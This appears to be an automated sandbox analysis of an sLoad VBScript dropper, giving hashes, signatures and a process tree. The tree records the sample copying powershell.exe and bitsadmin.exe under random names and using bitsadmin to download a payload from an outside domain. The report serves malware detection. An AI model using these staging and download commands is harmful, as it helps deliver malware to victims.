Analysis

  • max time kernel
    27s
  • max time network
    26s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    14-09-2020 12:24

General

  • Target

    Allegato_doc_03675480267.vbs

  • Size

    4KB

  • MD5

    a824af955b840327f2cf795b1b7fcabf

  • SHA1

    a13ec743a3a4476339c7e521e57b431355a5c67e

  • SHA256

    1dba2064e7290c1896d560ff266a18cb6bd9b7e82aad50ddcbe2afde3e43c53e

  • SHA512

    acab55eed2f7468495758666d67e9593eb9e32f44da823b2b0ac7560d78f76b0f1dded255f8f51a68023e3881fc46b1b362b1fb8c47517f5179fe26d7b5cba92

Score
10/10

Malware Config

Signatures

  • sLoad

    sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.

  • Executes dropped EXE 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_03675480267.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1144
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zWhZRIiim.exe
      2⤵
        PID:1060
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\WhZRIiim.exe
        2⤵
          PID:1508
        • C:\Users\Admin\AppData\Roaming\WhZRIiim.exe
          "C:\Users\Admin\AppData\Roaming\WhZRIiim.exe" /transfer szlqLE /download https://unequipoganador.com/ipol/03675480267/map.jpg C:\Users\Admin\AppData\Roaming\map.jpg
          2⤵
          • Executes dropped EXE
          PID:1796

      Network

      MITRE ATT&CK Matrix

      Replay Monitor

      Loading Replay Monitor...

      Downloads